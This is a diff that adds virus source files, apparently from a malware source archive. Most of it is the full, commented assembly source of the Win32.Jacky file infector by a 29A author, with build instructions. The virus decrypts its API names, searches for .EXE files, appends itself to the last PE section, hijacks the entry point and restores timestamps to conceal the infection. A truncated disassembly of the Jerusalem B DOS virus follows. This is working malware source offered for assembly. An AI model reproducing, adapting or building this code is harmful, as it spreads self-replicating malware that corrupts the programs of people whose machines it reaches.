a part of these strings +; are the names of system functions that are used during infection: +; +; KERNEL32 GetModuleHandleA GetProcAddress +; *.EXE +; CreateFileA CreateFileMappingA CloseHandle UnmapViewOfFile +; MapViewOfFile FindFirstFileA FindNextFileA FindClose +; SetFileAttributesA SetFilePointer SetEndOfFile SetFileTime +; +; To My d34d fRi3nD c4b4n4s.. +; A Win/NT/95 ViRuS v1.00. +; By: j4cKy Qw3rTy / 29A. +; jqw3rty@cryogen.com +;- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - ->8 +; +; +; Greetingz +; ÄÄÄÄÄÄÄÄÄ +; And finaly the greetinz go to: +; +; Mr.Chan, Wai ......... Thx for your help and advice.. master! +; MrSandman/29A ........ erm.. when will 29A#2 go out? hehe ;) +; QuantumG ............. What about yer NT resident driver idea? +; DarkSide1 ............ We are Southamerican rockerzzz! +; GriYo/29A ............ Implant poly rulez! +; +; +; Disclaimer +; ÄÄÄÄÄÄÄÄÄÄ +; This source code is for educational purposez only. The author is not res- +; ponsible for any problemz caused due to the assembly of this file. +; +; +; Compiling it +; ÄÄÄÄÄÄÄÄÄÄÄÄ +; tasm32 -ml -m5 -q -zn w32jacky.asm +; tlink32 -Tpe -c -x -aa w32jacky,,, import32 +; pewrsec w32jacky.exe +; +; +; (c) 1997 Jacky Qwerty/29A. + + +.386p +.model flat ;whoaa.. no more segmentz + +;Some includez containin very useful structurez and constantz for Win32 + +include Useful.inc +include Win32API.inc +include MZ.inc +include PE.inc + +;Some equ's needed by the virus + +work_size equ 4000h ;size to grow up memory maped file +size_pad equ 101 ;size paddin to mark infected filez +v_size equ v_end - v_start ;virus absolute size in filez + +extrn GetModuleHandleA :proc ;APIs used durin first generation only +extrn GetProcAddress :proc + +.data + db ? ;some dummy data so tlink32 dont yell + +.code + +;Virus code starts here + +v_start: + + push eax ;make space to store return adress + pushad ;save all + call get_deltaz ;here we go + +;API namez needed by the virus. They will travel in encrypted form + +ve_stringz: + +veszKernel32 db 'KERNEL32',0 +veszGetModuleHandleA db 'GetModuleHandleA',0 +veszGetProcAddress db 'GetProcAddress',0 + +eEXE_filez db '*.EXE',0 ;filez to search + +veszCreateFileA db 'CreateFileA',0 +veszCreateFileMappingA db 'CreateFileMappingA',0 +veszCloseHandle db 'CloseHandle',0 +veszUnmapViewOfFile db 'UnmapViewOfFile',0 +veszMapViewOfFile db 'MapViewOfFile',0 +veszFindFirstFileA db 'FindFirstFileA',0 +veszFindNextFileA db 'FindNextFileA',0 +veszFindClose db 'FindClose',0 +veszSetFileAttributesA db 'SetFileAttributesA',0 +veszSetFilePointer db 'SetFilePointer',0 +veszSetEndOfFile db 'SetEndOfFile',0 +veszSetFileTime db 'SetFileTime',0 + +eEndOfFunctionNames db 0 + +;An epitaph to a good friend of mine (not a "junkie" Pete) + +db 'To My d34d fRi3nD c4b4n4s..',CRLF +db 'A Win/NT/95 ViRuS v1.00. ',CRLF +db 'By: j4cKy Qw3rTy / 29A. ',CRLF +db 'jqw3rty@cryogen.com',0 + +ve_string_size = $ - ve_stringz + +crypt: lodsb ;decrypt API stringz + rol al,cl + not al + stosb + loop crypt + ret + +get_deltaz: + + mov ecx,ve_string_size + pop esi ;get pointer to ve_stringz + cld + lea ebp,[esi + v_end - ve_stringz] ;get pointer to virus end + lea eax,[esi + v_start - ve_stringz] + mov edi,ebp + stosd ;save pointer to virus start + add eax,- 12345678h +delta_host = dword ptr $ - 4 + stosd ;save current host base adress + lea edi,[ebp + v_stringz - v_end] ;get pointer to API namez + sub eax,- 12345678h +phost_start_rva = dword ptr $ - 4 + push edi ;push pointer to "KERNEL32" string + xchg ebx,eax + mov [esp.(Pshd).cPushad.RetAddr],ebx ;save host entry to return + +decrypt_stringz: + + call crypt ;decrypt encrypted API and stringz + call MyGetModuleHandleA ;get KERNEL32 base adress + jecxz jmp_host_2 + mov [ebp + K32Mod - v_end],ecx ;save it + lea esi,[ebp + FunctionNamez - v_end] + lea edi,[ebp + FunctionAddressez - v_end] + +GetAPIAddress: ;get adressez of API functionz used by the virus + + push esi + call MyGetProcAddressK32 ;get API adress + +jmp_host_2: + + jecxz jmp_host + cld + xchg eax,ecx + stosd ;save retrieved API adress + lodsb ;point to next API name + test al,al + jnz $ - 3 + cmp al,[esi] ;end of API namez reached? + jnz GetAPIAddress ;no, get next API adress + + lea ebx,[ebp + FindData - v_end] ;Find filez matchin *.EXE + push ebx + lea eax,[ebp + EXE_filez - v_end] + push eax + call [ebp + ddFindFirstFileA - v_end] ;call FindFirstFileA API + inc eax + jz jmp_host + dec eax + push eax ;save search handle + +Process_File: ;check file and infect it + + lea edx,[ebx.WFD_szFileName] + call Open&MapFile ;open and map file + jecxz Find_Next + xor eax,eax + cmp [ebx.WFD_nFileSizeHigh],eax ;skip filez too large (>1GB) + jnz Close_File + add eax,[ebx.WFD_nFileSizeLow] + js Close_File + add eax,-80h ;skip filez too short + jnc Close_File + call Check_PE_sign ;it has to be a PE file + jnz Close_File + test ah,IMAGE_FILE_DLL shr 8 ;can't have DLL bit + jnz Close_File + xor ecx,ecx + mov eax,[ebx.WFD_nFileSizeLow] ;check if file is infected + mov cl,size_pad + cdq + div ecx + mov esi,edx ;esi == 0, file already infected or not infectable + ;esi != 0, file not infected, i.e. infect it! +Close_File: + + call Close&UnmapFile ;close and unmap file + mov ecx,esi + jecxz Find_Next ;jump and find next file + call Infect ;infect file + +Find_Next: + + pop eax ;find next file + push eax ebx eax + call [ebp + ddFindNextFileA - v_end] + test eax,eax + jnz Process_File + +Find_Close: + + call [ebp + ddFindClose - v_end] ;no more filez, close search + +jmp_host: + + popad ;jump to host + ret + +Infect proc ;blank file attributez, open and map file in r/w mode, + ;infect it, restore date/time stamp and attributez + + lea edx,[ebx.WFD_szFileName] ;get filename + push edx 0 edx + call [ebp + ddSetFileAttributesA - v_end] ;blank file attributez + xchg ecx,eax + pop edx + jecxz end_Infect1 + mov edi,work_size + add edi,[ebx.WFD_nFileSizeLow] + call Open&MapFileAdj ;open and map file in read/write mode + jecxz end_Infect2 + lea esi,[ebp + vszKernel32 - v_end] + lea eax,[ebp + vszGetModuleHandleA - v_end] + push eax esi + lea eax,[ebp + vszGetProcAddress - v_end] + push eax esi ecx + call GetProcAddressIT ;get ptr to GetProcAddress API + mov [ebp + ddGetProcAddress - v_end],eax + push ecx + xor esi,esi + call GetProcAddressIT ;get ptr to GetModuleHandleA API + mov [ebp + ddGetModuleHandleA - v_end],eax + test eax,eax + jnz GetModHandle_found ;if GetModuleHandleA found, + test esi,esi ;jump and attach virus + jz end_Infect3 ;KERNEL32 import descriptor not found, + ;then dont infect + + x = IMAGE_SIZEOF_IMPORT_DESCRIPTOR + + ;GetModuleHandleA not found + + cmp [esi.ID_TimeDateStamp - x],eax ;check if we can rely on + jz got_easy ;the ForwarderChain trick + cmp eax,[esi.ID_OriginalFirstThunk - x] + jz end_Infect3 + mov [esi.ID_TimeDateStamp - x],eax + +got_easy: + + mov eax,[esi.ID_ForwarderChain - x] ;hardcode pointerz to + mov [ebp + ptrForwarderChain - v_end],edx ;the ForwarderChain + mov [ebp + ddForwarderChain - v_end],eax ;field + +GetModHandle_found: + + mov esi,[ebp + pv_start - v_end] + call Attach ;attach virus to host +end_Infect3: + + call Close&UnmapFileAdj ;close and unmap file + +end_Infect2: + + mov ecx,[ebx.WFD_dwFileAttributes] ;restore original atribute + jecxz end_Infect1 + lea edx,[ebx.WFD_szFileName] + push ecx edx + call [ebp + ddSetFileAttributesA - v_end] + +end_Infect1: + + ret + +Infect endp + +Check_PE_sign proc ;checks validity of a PE file + ; on entry: EDX = host file size + ; ECX = base address of memory-maped file + ; EBX = pointer to WIN32_FIND_DATA structure + ; EAX = host file size - 80h + ; on exit: Zero flag = 1, infectable PE file + ; Zero flag = 0, not infectable file + + cmp word ptr [ecx],IMAGE_DOS_SIGNATURE ;needs MZ signature + jnz end_check_PE_sign + cmp word ptr [ecx.MZ_lfarlc],40h ;needs Win signature + jb end_check_PE_sign ;(well not necesarily) + mov edi,[ecx.MZ_lfanew] ;get ptr to new exe format + cmp eax,edi ;ptr out of range? + jb end_check_PE_sign + add edi,ecx + cmp dword ptr [edi],IMAGE_NT_SIGNATURE ;check PE signature + jnz end_check_PE_sign + cmp word ptr [edi.NT_FileHeader.FH_Machine], \ ;must be 386+ + IMAGE_FILE_MACHINE_I386 + jnz end_check_PE_sign + mov eax,dword ptr [edi.NT_FileHeader.FH_Characteristics] + not al + test al,IMAGE_FILE_EXECUTABLE_IMAGE ;must have the executable bit + +end_check_PE_sign: + + ret + +Check_PE_sign endp + +Open&MapFile proc ;open and map file in read only mode + ; on entry: + ; EDX = pszFileName (pointer to file name) + ; on exit: + ; ECX = 0, if error + ; ECX = base adress of memory-maped file, if ok + + xor edi,edi + +Open&MapFileAdj: ;open and map file in read/write mode + ; on entry: + ; EDI = file size + work space (in bytes) + ; EDX = pszFileName (pointer to file name) + ; on exit: + ; ECX = 0, if error + ; ECX = base adress of memory-maped file, if ok + ; EDI = old file size + + xor eax,eax + push eax eax OPEN_EXISTING eax eax + mov al,1 + ror eax,1 + mov ecx,edi + jecxz $+4 + rcr eax,1 + push eax edx + call [ebp + ddCreateFileA - v_end] ;open file + cdq + inc eax + jz end_Open&MapFile + dec eax + push eax ;push first handle + + xor esi,esi + push edx edi edx + mov dl,PAGE_READONLY + mov ecx,edi + jecxz $+4 + shl dl,1 + push edx esi eax + call [ebp + ddCreateFileMappingA - v_end] ;create file + cdq ;mapping + xchg ecx,eax + jecxz end_Open&MapFile2 + push ecx ;push second handle + + push edi edx edx + mov dl,FILE_MAP_READ + test edi,edi + jz OMF_RdOnly + shr dl,1 + mov edi,[ebx.WFD_nFileSizeLow] +OMF_RdOnly: push edx ecx + call [ebp + ddMapViewOfFile - v_end] ;map view of file + xchg ecx,eax + jecxz end_Open&MapFile3 + push ecx ;push base address of + ;memory-mapped file + jmp [esp.(3*Pshd).RetAddr] ;jump to return adress leavin + ;parameterz in the stack +Open&MapFile endp + +Close&UnmapFile proc ;close and unmap file previosly opened in r/o mode + + xor edi,edi + +Close&UnmapFileAdj: ;close and unmap file previosly opened in r/w mode + + pop eax ;return adress + mov [esp.(3*Pshd).RetAddr],eax + call [ebp + ddUnmapViewOfFile - v_end] ;unmap view of file + +end_Open&MapFile3: + + call [ebp + ddCloseHandle - v_end] ;close handle + mov ecx,edi + jecxz end_Open&MapFile2 ;if read only mode jump + pop eax + push eax eax + xor esi,esi + push esi esi edi eax + xchg edi,eax + call [ebp + ddSetFilePointer - v_end] ;move file pointer to + ;the real end of file + call [ebp + ddSetEndOfFile - v_end] ;truncate file at + lea eax,[ebx.WFD_ftLastWriteTime] ;real end of file + push eax esi esi edi + call [ebp + ddSetFileTime - v_end] ;restore original + ;date/time stamp +end_Open&MapFile2: + + call [ebp + ddCloseHandle - v_end] ;close handle + +end_Open&MapFile: + + xor ecx,ecx + ret + +Close&UnmapFile endp + +Attach proc ;attach virus code to last section in the PE file and + ; change section characteristicz to reflect infection + ;on entry: + ; ECX = base of memory-maped file + ; ESI = pointer to start of virus code + ;on exit: + ; EDI = new file size + pushad + push ecx + mov ebp,ecx ;get base adress + add ebp,[ebp.MZ_lfanew] ;get PE header base + movzx ecx,word ptr [ebp.NT_FileHeader \ ;get Number of Sections + .FH_NumberOfSections] + xor eax,eax + movzx edi,word ptr [ebp.NT_FileHeader \ ;get 1st section header + .FH_SizeOfOptionalHeader] + x = IMAGE_SIZEOF_SECTION_HEADER + mov al,x + mul ecx ;get last section header + pop edx + jecxz end_Attach2 + add edi,eax + lea ebx,[ebp.NT_OptionalHeader + edi] + mov ecx,[ebx.SH_SizeOfRawData - x] + mov eax,[ebx.SH_VirtualSize - x] + cmp ecx,eax + jnc $+3 + xchg eax,ecx + add edx,[ebx.SH_PointerToRawData - x] + sub eax,-3 + mov ecx,(v_size + 3)/4 + and al,-4 + lea edi,[eax+edx] ;find pointer in last section where virus + cld ;will be copied + rep movsd ;copy virus + add eax,[ebx.SH_VirtualAddress - x] ;calculate virus entry point + mov ecx,[ebp.NT_OptionalHeader.OH_FileAlignment] ;in RVA + +end_Attach2: + + jecxz end_Attach + push eax ;virus entry point + lea esi,[edi + (phost_start_rva - v_start) - ((v_size + 3) \ + and (-4))] + neg eax + sub edi,edx + mov [esi + delta_host - phost_start_rva],eax ;harcode delta to + lea eax,[ecx+edi-1] ;host base adress + cdq ;edx=0 + sub edx,[ebp.NT_OptionalHeader.OH_AddressOfEntryPoint] + mov [esi],edx ;hardcode delta to original entry point RVA + cdq ;edx=0 + div ecx + pop esi ;virus entry point + mul ecx ;calculate new size of section (raw data) + xchg eax,edi + mov ecx,[ebp.NT_OptionalHeader.OH_SectionAlignment] + add eax,(virtual_end - v_end + 3) and (-4) + jecxz end_Attach + cmp [ebx.SH_VirtualSize - x],eax + jnc n_vir + mov [ebx.SH_VirtualSize - x],eax ;store new size of section (RVA) + n_vir: dec eax + mov [ebx.SH_SizeOfRawData - x],edi ;store new size of section + add eax,ecx ;(raw data) + div ecx + mul ecx + add eax,[ebx.SH_VirtualAddress - x] + cmp [ebp.NT_OptionalHeader.OH_SizeOfImage],eax + jnc n_img + mov [ebp.NT_OptionalHeader.OH_SizeOfImage],eax ;store new size + ;of image (RVA) + n_img: add edi,[ebx.SH_PointerToRawData - x] ;get new file size + sub ecx,ecx + or byte ptr [ebx.SH_Characteristics.hiw.hib - x],0E0h ;change + ; (IMAGE_SCN_MEM_EXECUTE or \ ;section characte- + ; IMAGE_SCN_MEM_READ or \ ;risticz to: execute, + ; IMAGE_SCN_MEM_WRITE) shr 12 ;read & write access + pop eax ;get original file size + mov cl,size_pad + cdq ; edx=0 + cmp edi,eax ;compare it with new file size + jc $+3 + xchg edi,eax ;take the greater + sub eax,1 - size_pad + div ecx + mul ecx ;grow file size to a multiple of size_pad + push eax + mov [ebp.NT_OptionalHeader.OH_AddressOfEntryPoint],esi ;change + ;entry point +end_Attach: + + popad + ret + +Attach endp + +GetProcAddressIT proc ;gets a pointer to an API function from the Import Table + ; (the object inspected is in raw form, ie memory-maped) + ;on entry: + ; TOS+0Ch (Arg3): API function name + ; TOS+08h (Arg2): module name + ; TOS+04h (Arg1): base adress of memory-maped file + ; TOS+00h (return adress) + ;on exit: + ; EAX = RVA pointer to IAT entry + ; EAX = 0, if not found + pushad + mov ebp,[esp.cPushad.Arg1] ;get Module Handle from Arg1 + lea esi,[ebp.MZ_lfanew] + add esi,[esi] ;get address of PE header + MZ_lfanew + mov ecx,[esi.NT_OptionalHeader \ ;get size of import directory + .OH_DirectoryEntries \ + .DE_Import \ + .DD_Size \ + -MZ_lfanew] + jecxz End_GetProcAddressIT2 ;if size is zero, no API imported! + movzx ecx,word ptr [esi.NT_FileHeader \ ;get number of sectionz + .FH_NumberOfSections \ + -MZ_lfanew] + jecxz End_GetProcAddressIT2 + movzx ebx,word ptr [esi.NT_FileHeader \ ;get 1st section header + .FH_SizeOfOptionalHeader \ + -MZ_lfanew] + lea ebx,[esi.NT_OptionalHeader + ebx - MZ_lfanew] + x = IMAGE_SIZEOF_SECTION_HEADER + +match_virtual: ;find section containin the import table. (not necesarily + ;its in the .idata section!) + + mov edi,[esi.NT_OptionalHeader \ ;get address of import table + .OH_DirectoryEntries \ + .DE_Import \ + .DD_VirtualAddress \ + -MZ_lfanew] + mov edx,[ebx.SH_VirtualAddress] ;get RVA start pointer of + sub edi,edx ;current section + add ebx,x + cmp edi,[ebx.SH_VirtualSize - x] ;address of import table + ;inside current section? + jb import_section_found ;yea, we found it + loop match_virtual ;no, try next section + jmp End_GetProcAddressIT ;no more sectionz, shit.. go + +import_section_found: + + push edi + mov eax,[ebx.SH_SizeOfRawData - x] + mov ebx,[ebx.SH_PointerToRawData - x] + xchg ebp,eax ;get RAW size of import section (EBP) + add ebx,eax ;get RAW start of import section (EBX) + cld + x = IMAGE_SIZEOF_IMPORT_DESCRIPTOR + +Get_DLL_Name: ;scan each import descriptor inside import section to match + ;module name specified + + pop esi ;diference (if any) between start + ;of imp.table and start of imp.section + mov ecx,[ebx.esi.ID_Name] ;get RVA pointer to imp.module name + +End_GetProcAddressIT2: + + jecxz End_GetProcAddressIT ;end of import descriptorz? + sub ecx,edx ;convert RVA pointer to RAW + cmp ecx,ebp ;check if it points inside section + jae End_GetProcAddressIT + add esi,x + push esi ;save next import descriptor for later + lea esi,[ebx + ecx] ;retrieval + mov edi,[esp.(Pshd).cPushad.Arg2] ;get module name specified + ;from Arg2 +Next_char_from_DLL: ;do a char by char comparison with module name found + ;inside section. Stop when a NULL or a dot is found + lodsb + add al,-'.' + jz IT_nup ;its a dot + sub al,-'.'+'a' + cmp al, 'z'-'a'+ 1 + jae no_up + add al,-20h ;convert to upercase +no_up: sub al,-'a' +IT_nup: scasb + jnz Get_DLL_Name ;names dont match, get next import descriptor + cmp byte ptr [edi-1],0 + jnz Next_char_from_DLL + +Found_DLL_name: ;we got the import descriptor containin specified module name + + pop esi + lea eax,[edx + esi.ID_ForwarderChain - x] + add esi,ebx + mov [esp.Pushad_edx],eax ;store ptr to ForwarderChain for l8r + mov [esp.Pushad_esi],esi ;store ptr to imp.descriptor for l8r + push dword ptr [esp.cPushad.Arg3] + mov eax,[esp.(Pshd).Pushad_ebp] + push dword ptr [eax + K32Mod - v_end] + call GetProcAddressET ;scan exp.table of spec.module handle + xchg eax,ecx ;and get function adress of spec.API + mov ecx,[esi.ID_FirstThunk - x] ;This is needed just in case the + ;API function adressez are bound + jecxz End_GetProcAddressIT ;if not found then go, this value cant + ;be zero or the IAT wont be patched + push eax + call GetProcAddrIAT ;inspect first thunk (which later will + test eax,eax ;be patched by the loader) + jnz IAT_found ;if found then jump (save it and go) + mov ecx,[esi.ID_OriginalFirstThunk - x] ;get original thunk + ;(which later will hold the original + ;unpatched IAT) + jecxz End_GetProcAddressIT ;if not found then go, this value + push eax ;could be zero + call GetProcAddrIAT ;inspect original thunk + test eax,eax + jz IAT_found ;jump if not found + sub eax,ecx ;we got the pointer + add eax,[esi.ID_FirstThunk - x] ;convert it to RVA + db 6Bh,33h,0C0h ;imul esi,[ebx],-0C0h ;bizarre! but no jump + org $ - 2 ;necesary! + +End_GetProcAddressIT: + + db 33h,0C0h ;xor eax,eax ;error, adress not found + +IAT_found: + + mov [esp.Pushad_eax],eax ;save IAT entry pointer + popad + ret (3*Pshd) ;go and unwind parameterz in stack + +GetProcAddrIAT: ;this function scans the IMAGE_THUNK_DATA array of "dwords" + ; from the selected IMAGE_IMPORT_DESCRIPTOR, searchin for + ; the selected API name. This function works for both + ; bound and unbound import descriptorz. This function is + ; called from inside GetProcAddressIT. + ;on entry: + ; EBX = RAW start pointer of import section + ; ECX = RVA pointer to IMAGE_THUNK_ARRAY + ; EDX = RVA start pointer of import section + ; EDI = pointer selected API function name. + ; EBP = RAW size of import section + ; TOS+04h (Arg1): real address of API function inside selected + ; module (in case the descriptor is unbound). + ; TOS+00h (return adress) + ;on exit: + ; EAX = RVA pointer to IAT entry + ; EAX = 0, if not found + + push ecx + push esi + + xor eax,eax + sub ecx,edx + cmp ecx,ebp + jae IT_not_found + lea esi,[ebx + ecx] ;get RAW pointer to IMAGE_THUNK_DATA array + +next_thunk_dword: + + lodsd ;get dword value + test eax,eax ;end of IMAGE_THUNK_DATA array? + jz IT_not_found + +no_ordinal: + + sub eax,edx ;convert dword to a RAW pointer + cmp eax,ebp ;dword belongs to an unbound image descriptor? + jb IT_search ;no, jump + add eax,edx ;we have the API adress, reconvert to RVA + cmp eax,[esp.(2*Pshd).Arg1] ;API adressez match? + jmp IT_found? ;yea, we found it, jump + +IT_search: + + push esi ;image descr.contains imports by name + lea esi,[ebx+eax.IBN_Name] ;get API name from import descriptor + mov edi,[esp.(5*Pshd).cPushad.Arg3] ;get API name selected as a + ;parameter +IT_next_char: + ;find req.API from all imported API namez + cmpsb ;do APIz match? + jnz IT_new_search ;no, continue searchin + +IT_Matched_char: + + cmp byte ptr [esi-1],0 + jnz IT_next_char + +IT_new_search: + + pop esi ;yea, they match, we found it + +IT_found?: + + jnz next_thunk_dword + lea eax,[edx+esi-4] ;get the pointer to the new IAT entry + sub eax,ebx ;convert it to RVA + +IT_not_found: + + pop esi + pop ecx + + ret (Pshd) + +GetProcAddressIT endp + +GetProcAddressET proc ;This function is similar to GetProcAddressIT except + ; that it looks for API functions in the export table + ; of a given DLL module. It has the same functionality + ; as the original GetProcAddress API exported from + ; KERNEL32 except that it is able to find API + ; functions exported by ordinal from KERNEL32. + ;on entry: + ; TOS+08h (Arg2): pszAPIname (pointer to API name) + ; TOS+04h (Arg1): module handle/base address of module + ; TOS+00h (return adress) + ;on exit: + ; ECX = API function address + ; ECX = 0, if not found + pushad + mov eax,[esp.cPushad.Arg1] ;get Module Handle from Arg1 + mov ebx,eax + add eax,[eax.MZ_lfanew] ;get address of PE header + mov ecx,[eax.NT_OptionalHeader \ ;get size of Export directory + .OH_DirectoryEntries \ + .DE_Export \ + .DD_Size] + jecxz Proc_Address_not_found ;size is zero, No API exported ! + mov ebp,ebx ;get address of Export directory + add ebp,[eax.NT_OptionalHeader \ + .OH_DirectoryEntries \ + .DE_Export \ + .DD_VirtualAddress] +ifndef NoOrdinal + mov eax,[esp.cPushad.Arg2] ;get address of requested API name or + ;ordinal value from Arg2 + test eax,-10000h ;check if Arg2 is an ordinal + jz Its_API_ordinal +endif + +Its_API_name: + + push ecx + mov edx,ebx ;get address of exported API names + add edx,[ebp.ED_AddressOfNames] + mov ecx,[ebp.ED_NumberOfNames] ;get number of exported API names + xor eax,eax + cld + +Search_for_API_name: + + mov esi,ebx ;get address of next exported API name + add esi,[edx+eax*4] + mov edi,[esp.Pshd.cPushad.Arg2] ;get address of requested API name + ;from Arg2 +Next_Char_in_API_name: + + cmpsb ;find requested API from all + jz Matched_char_in_API_name ;exported API namez + inc eax + loop Search_for_API_name + pop eax + +Proc_Address_not_found: + + xor eax,eax ;API not found + jmp End_GetProcAddressET + +ifndef NoOrdinal + +Its_API_ordinal: + + sub eax,[ebp.ED_BaseOrdinal] ;normalize Ordinal, i.e. + jmp Check_Index ;convert it to an index +endif + +Matched_char_in_API_name: + + cmp byte ptr [esi-1],0 ;end of API name reached? + jnz Next_Char_in_API_name + pop ecx + mov edx,ebx ;get address of exp.API ordinals + add edx,[ebp.ED_AddressOfOrdinals] + movzx eax,word ptr [edx+eax*2] ;get index into exp.API functions + +Check_Index: + + cmp eax,[ebp.ED_NumberOfFunctions] ;check for out of range index + jae Proc_Address_not_found + mov edx,ebx ;get address of exported API functions + add edx,[ebp.ED_AddressOfFunctions] + add ebx,[edx+eax*4] ;get address of requested API function + mov eax,ebx + sub ebx,ebp ;take care of forwarded API functions + cmp ebx,ecx + jb Proc_Address_not_found + +End_GetProcAddressET: + + mov [esp.Pushad_ecx],eax ;set requested Proc Address, if found + popad + ret (2*Pshd) + +GetProcAddressET endp + +MyGetProcAddressK32: ;this function is simply a wraper to the GetProcAddress + ; API. It retrieves the address of an API function + ; exported from KERNEL32. + ;on entry: + ; TOS+04h (Arg1): pszAPIname (pointer to API name) + ; TOS+00h (return adress) + ;on exit: + ; ECX = API function address + ; ECX = 0, if not found + + + pop eax + push dword ptr [ebp + K32Mod - v_end] ;KERNEL32 module handle + push eax + +MyGetProcAddress proc + + mov ecx,12345678h ;this dynamic variable will hold an RVA +ddGetProcAddress = dword ptr $ - 4 ;pointer to the GetProcAddress API in + ;the IAT +gotoGetProcAddressET: + + jecxz GetProcAddressET + push [esp.Arg2] + push [esp.(Pshd).Arg1] + add ecx,[ebp + phost_hdr - v_end] + call [ecx] ;call the original GetProcAddress API + xchg ecx,eax + jecxz gotoGetProcAddressET ;if error, call my own GetProcAddress + ret (2*Pshd) ;function + +MyGetProcAddress endp + +MyGetModuleHandleA proc ;this function retrieves the base address/module + ;handle of a DLL module previosly loaded to memory. + pop ecx + pop eax + push ecx + mov edx,[ebp + phost_hdr - v_end] + mov ecx,12345678h ;this dynamic variable will hold an RVA +ddGetModuleHandleA = dword ptr $ - 4 ;pointer to the GetModuleHandleA API in + jecxz check_K32 ;the IAT + +GetModHandleA: + + push eax + call [ecx + edx] ;call the original GetModuleHandleA API + xor ecx,ecx + jmp really_PE? + +check_K32: + + mov eax,[edx + 12345678h] ;this dynamic variable will hold an + ;RVA pointer to the ForwarderChain + ;field in the KERNEL32 import + ;descriptor. This is an undocumented +ptrForwarderChain = dword ptr $ - 4 ;feature to get the K32 base address + inc eax + jz End_GetModHandleA ;make sure the base address is ok + dec eax + jz End_GetModHandleA + cmp eax,12345678h ;this dynamic variable will hold the + ;prev.contents of the ForwarderChain + ;field in the K32 import descriptor +ddForwarderChain = dword ptr $ - 4 ;if they match, then the Win32 loader + jz End_GetModHandleA ;didnt copy the K32 base address + +really_PE?: + + cmp word ptr [eax],IMAGE_DOS_SIGNATURE ;make sure its the base + jnz End_GetModHandleA ;address of a PE module + mov edx,[eax.MZ_lfanew] + cmp dword ptr [eax + edx],IMAGE_NT_SIGNATURE + jnz End_GetModHandleA + xchg ecx,eax + +End_GetModHandleA: + + ret + +MyGetModuleHandleA endp + +align 4 ;set dword alignment + +v_end: + +;uninitialized data ;these variablez will be addressed in memory, but + ;dont waste space in the file + +pv_start dd ? ;pointer to virus start in memory +phost_hdr dd ? ;ptr to the host base address in mem +K32Mod dd ? ;KERNEL32 base address + +FunctionAddressez: ;these variables will hold the API function addressez + ;used in the virus + +ddCreateFileA dd ? +ddCreateFileMappingA dd ? +ddCloseHandle dd ? +ddUnmapViewOfFile dd ? +ddMapViewOfFile dd ? +ddFindFirstFileA dd ? +ddFindNextFileA dd ? +ddFindClose dd ? +ddSetFileAttributesA dd ? +ddSetFilePointer dd ? +ddSetEndOfFile dd ? +ddSetFileTime dd ? + +v_stringz: ;the API names used by the virus are decrypted here + +vszKernel32 db 'KERNEL32',0 +vszGetModuleHandleA db 'GetModuleHandleA',0 +vszGetProcAddress db 'GetProcAddress',0 + +EXE_filez db '*.EXE',0 ;the file mask + +FunctionNamez: + +vszCreateFileA db 'CreateFileA',0 +vszCreateFileMappingA db 'CreateFileMappingA',0 +vszCloseHandle db 'CloseHandle',0 +vszUnmapViewOfFile db 'UnmapViewOfFile',0 +vszMapViewOfFile db 'MapViewOfFile',0 +vszFindFirstFileA db 'FindFirstFileA',0 +vszFindNextFileA db 'FindNextFileA',0 +vszFindClose db 'FindClose',0 +vszSetFileAttributesA db 'SetFileAttributesA',0 +vszSetFilePointer db 'SetFilePointer',0 +vszSetEndOfFile db 'SetEndOfFile',0 +vszSetFileTime db 'SetFileTime',0 + +EndOfFunctionNames db 0 + +align 4 + +FindData WIN32_FIND_DATA ? + +virtual_end: + +first_generation: ;this routine will be called only once from the first + ;generation sample, it simply initializes some variables + ;needed in the very first run. +jumps + push NULL + call GetModuleHandleA + test eax,eax + jz exit_host + xchg ecx,eax + call here +here: pop ebx + + mov eax,ebx + sub eax,here - v_start + sub eax,ecx + neg eax + mov [ebx + delta_host - here],eax ;set delta host value + + mov eax,ebx + sub eax,here - host + sub eax,ecx + neg eax + mov [ebx + phost_start_rva - here],eax ;set pointer to + ;host's base adress + mov eax,[ebx + pfnGMH - here] + .if word ptr [eax] == 25FFh ; JMP [nnnnnnnn] + mov eax,[eax + 2] + .endif + sub eax,ecx + mov [ebx + ddGetModuleHandleA - here],eax ;set GetModuleHandleA + ;RVA pointer + mov eax,[ebx + pfnGPA - here] + .if word ptr [eax] == 25FFh ; JMP [nnnnnnnn] + mov eax,[eax + 2] + .endif + sub eax,ecx + mov [ebx + ddGetProcAddress - here],eax ;set GetProcAddress + ;RVA pointer + pushad ;encrypt unencrypted API namez and other + ;stringz + cld + mov ecx,ve_string_size + lea esi,[ebx + ve_stringz - here] + mov edi,esi + call crypt_back + popad + jmp v_start ;ok, here we go.. jump to virus start.. + +crypt_back: ;encryption routine + + lodsb + not al + ror al,cl + stosb + loop crypt_back + ret + +pfnGMH dd offset GetModuleHandleA +pfnGPA dd offset GetProcAddress + +;Host code starts here + +extrn MessageBoxA: proc +extrn ExitProcess: proc + +host: ;here begins the original host code + +;Display Message box + + push MB_OK + @pushsz "(c) Win32.Jacky by jqwerty/29A" + @pushsz "First generation sample" + push NULL + call MessageBoxA + +;Exit host + +exit_host: + + push 0 + call ExitProcess + + end first_generation diff --git a/MSDOS/Virus.MSDOS.Unknown.jeru-b.asm b/MSDOS/Virus.MSDOS.Unknown.jeru-b.asm new file mode 100644 index 00000000..556a184d --- /dev/null +++ b/MSDOS/Virus.MSDOS.Unknown.jeru-b.asm @@ -0,0 +1,794 @@ +This is the Jerusalem B Virus. +"JV.MOC" PAGE 0001 + +0000:0000 E99200 JMP X0095 +0000:0003 7355 JAE X005A +0000:0005 4D DEC BP +0000:0006 7344 JAE X004C +0000:0008 6F73 JG X007D +0000:000A 0001 ADD [BX+DI],AL +0000:000C BD1700 MOV BP,0017H +0000:000F 0000 ADD [BX+SI],AL +0000:0011 06 PUSH ES +0000:0012 00A5FE00 ADD [DI+Y00FEH],AH +0000:0016 F016 LOCK PUSH SS +0000:0018 17 POP SS +0000:0019 7702 JA X001D +0000:001B BF053D MOV DI,03D05H +0000:001E 0CFB OR AL,0FBH +0000:0020 7D00 JGE X0022 +0000:0022 0000 X0022: ADD [BX+SI],AL +0000:0024 0000 ADD [BX+SI],AL +0000:0026 0000 ADD [BX+SI],AL +0000:0028 0000 ADD [BX+SI],AL +0000:002A 0000 ADD [BX+SI],AL +0000:002C 0000 ADD [BX+SI],AL +0000:002E E8062A CALL X2A37 +0000:0031 B10D MOV CL,0DH +0000:0033 800000 ADD BYTE PTR [BX+SI],00H +0000:0036 008000B1 ADD [BX+SI+Y0B100H],AL +0000:003A 0D5C00 